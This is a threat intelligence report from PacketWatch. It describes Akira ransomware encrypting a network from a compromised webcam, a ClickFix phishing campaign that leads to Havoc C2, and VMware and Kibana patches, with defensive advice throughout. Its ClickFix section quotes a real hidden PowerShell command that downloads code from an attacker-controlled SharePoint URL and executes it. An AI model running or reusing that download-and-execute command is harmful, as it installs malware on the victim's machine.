Cyber Threat Intelligence Report | 3/10/2025 | PacketWatch

This week, we briefed our clients on a report that found attackers using vulnerable operating systems of IoT devices to launch ransomware encryptors.

 KEY TAKEAWAYS 

• Akira ransomware group using new IoT method to deploy ransomware.

• New ClickFix phishing campaign leads to Havoc C2.

• Critical vulnerabilities in multiple VMware products, Elastic’s Kibana. Patch now!

Akira Uses IoT To Deploy Ransomware

Akira, the double-extortion Ransomware-as-a-Service group, had a prolific year in 2024, claiming over 300 victims across the globe. While their typical playbook to achieve ransomware deployment within their target environments is generally well-known, incident responders at S-RM documented a new technique Akira leveraged to fully compromise their target.

Akira gains initial access by compromising externally-facing remote access tools such as a VPN devices. From there they usually deploy a remote access tool such as AnyDesk.exe to maintain persistence, and use RDP to pivot between hosts. In the incident documented by S-RM, once Akira first attempted to deploy and detonate their ransomware encryptor, it was blocked an quarantined by the victim's EDR solution. At this point, many ransomware groups would simply move on to other targets, or simply try to extort the victim with only the data that was exfiltrated before the attempted encryption event.

However, during an earlier reconnaissance phase of the attack, Akira identified a webcam on the victim's network. This particular webcam had several critical vulnerabilities that allowed for remote code execution. The webcam also ran on a lightweight version of Linux, effectively making it an unmanaged (unprotected) Linux device.  Akira compromised the webcam and was then able to mount Windows SMB shares of other devices and launch the Linux version of their encryptor. This method effectively bypassed the EDR protections on the victim's network.

Lessons Learned

• While EDR is a critically important part of a holistic cybersecurity strategy, it is not a silver bullet. Determined attackers will find a way to bypass single security controls.
• The webcam had patches available for the flaws Akira abused. Patch management programs need to consider IoT devices in their patch scheduling, as these devices are abused by threat actors. If IoT devices are found to be end-of-life and are no longer supported with firmware updates, they should either be completely isolated on a separate network or replaced with newer supported versions.
• As noted in the report by S-RM, the victim's security team was unaware of the large increase in SMB traffic between the compromised webcam and the impacted server.
• Even when an EDR tool blocks or quarantines a malicious file, that does not mean the threat is contained. Detailed analysis of the full extent of the malware event should always be performed, especially when the malware is identified as a ransomware encryptor. Steps should be taken to ensure the threat actor is fully removed from the environment.
• This highlights the importance of network monitoring tools such as PacketWatch which give you full visibility into your network traffic.

Resources:

• https://www.s-rminform.com/latest-thinking/camera-off-akira-deploys-ransomware-via-webcam
  

• https://www.bleepingcomputer.com/news/security/akira-ransomware-encrypted-network-from-a-webcam-to-bypass-edr/

New ClickFix Phishing Campaign

ClickFix is a newer social engineering technique where the victim is prompted with a fake error message. A "Fix" button is then displayed to the victim. Upon clicking this button, malicious PowerShell code is copied to the victim's Clipboard. They are then prompted to press the "Windows" key to open either the Run command terminal, or a PowerShell Terminal. Finally, they are prompted to press "CTRL + V" and "Enter", thereby pasting and executing the malicious code.

A new ClickFix phishing campaign was identified by Fortinet Labs Threat Research. In this campaign, the victim is sent a phishing email with an attachment called "Documents.html". The email urges the user to open the attachment immediately. The HTML file opens a fake Error page with a "How to Fix" button displayed. Once this button is clicked, it copies malicious PowerShell code to the Clipboard and then instructs the victim to open a PowerShell Terminal and paste and execute the malicious code.

Fig. 1: Documents.html Phishing Attachment   Source: BleepingComputer

Fig. 2: ClickFix Instructions   Source: BleepingComputer

The malicious payload is then downloaded from an attacker-controlled SharePoint page:

powershell -w h -c "iwr ‘hxxps://hao771[.]sharepoint.com/_layouts/15/download.aspx?share=EU7smZuKo-pDixZ26BSAaX0BVVcF5VkOc7qEvjsDSAH9OQ'|iex"

A series of loaders are downloaded and executed until the final payload, Havoc C2, is downloaded. Havoc is an open-source command-and-control (C2) framework similar to Cobalt Strike that gives the threat actor persistent access to the compromised host, and allows them to execute further commands, download additional malware, and pivot further into the compromised network.

How to Protect Your Organization

• User Awareness Training - These types of social engineering methods, where the user is tricked into executing malicious code themselves, is becoming increasingly common. Users should be trained to never run any sort of code on their own machine. Ideally, user access to the command prompt or PowerShell terminal should be restricted via GPO policies.
• Endpoint Detection Tools - Having fully up-to-date EDR solutions applied to all endpoints is a critical piece of thwarting this type of attack. Since the attacker hosts the malicious payloads on benign websites like SharePoint, network detection tools such as IDS/IPS will not flag these downloads. EDR tools will detect malicious behavior heuristics that correspond with attack tools such as Havoc.
• Restrict Email Attachment File Types - If possible, restrict the types of files that are allowed to be received as an email attachment. Non-standard email attachments such as .html, .7z, .exe, .cmd, .vbs, .msi, .iso, .bat, .ps1, .hta, etc, should be blocked at the email gateway as threat actors leverage these file types to deliver malware. Email gateway policy restrictions should be as restrictive as the business work allows.

Resources:

• https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2
  

• https://blog.criminalip.io/2024/10/07/clickfix-fake-error-messages/
  

• https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clickfix-deception-a-social-engineering-tactic-to-deploy-malware/
  

• https://www.bleepingcomputer.com/news/security/new-clickfix-attack-deploys-havoc-c2-via-microsoft-sharepoint/

Vulnerability Roundup

VMware ESXi Vulnerability Actively Exploited

Last week, Broadcom issued a security bulletin detailing 3 new critical vulnerabilities in their VMware products. The set of vulnerabilities, tracked as CVE-2025-22224, CVE-2025-22225, and CVE-2025-22226, allow for an attacker who has already compromised the virtual machine's (VM) guest OS and has achieved administrator or root privileges to escape the VM and pivot to the hypervisor (host machine) itself. CISA has since added these vulnerabilities to the Known Exploited Vulnerabilities (KEV) catalog, as exploitation has been observed in the wild. These vulnerabilities affect a wide range of VMware products, including VMware ESXi, VMware Workstation, VMware Fusion, VMware Cloud Foundation, VMware Telco Cloud Platform, and Vmawre Telco Cloud Infrastructure. For a full listing of vulnerable versions and corresponding fixed versions, please see the Broadcom disclosure here. Administrators are urged to apply the appropriate patches as soon as possible.

• https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25390

• https://thehackernews.com/2025/03/vmware-security-flaws-exploited-in.html

• https://www.bleepingcomputer.com/news/security/over-37-000-vmware-esxi-servers-vulnerable-to-ongoing-attacks/

   

Critical Code Execution Flaw in Kibana

A critical vulnerability in Elastic's Kibana data visualization software was recently disclosed. Tracked as CVE-2025-25012, the vulnerability allows for a threat actor to achieve code execution via specially crafted file uploads or HTTP requests. The issue affects Kibana versions between 8.15.0 and 8.17.3. Administrators are urged to patch to version 8.17.3 or higher as soon as possible. If an upgrade is not possible, the vulnerability can be mitigated by setting 'xpack.integration_assistant.enabled: false' in Kibana's configuration.

• https://discuss.elastic.co/t/kibana-8-17-3-security-update-esa-2025-06/375441
• https://thehackernews.com/2025/03/elastic-releases-urgent-fix-for.html

This report is provided FREE to the cybersecurity community.

Visit our Cyber Threat Intelligence Blog for additional reports.

Subscribe to be notified of future Reports:

NOTE
We have enhanced our report with data from SOCRadar. You may need to register to view their threat intelligence content.

DISCLAIMER
Kindly be advised that the information contained in this article is presented with no final evaluation and should be considered raw data. The sole purpose of this information is to provide situational awareness based on the currently available knowledge. We recommend exercising caution and conducting further research as necessary before making any decisions based on this information.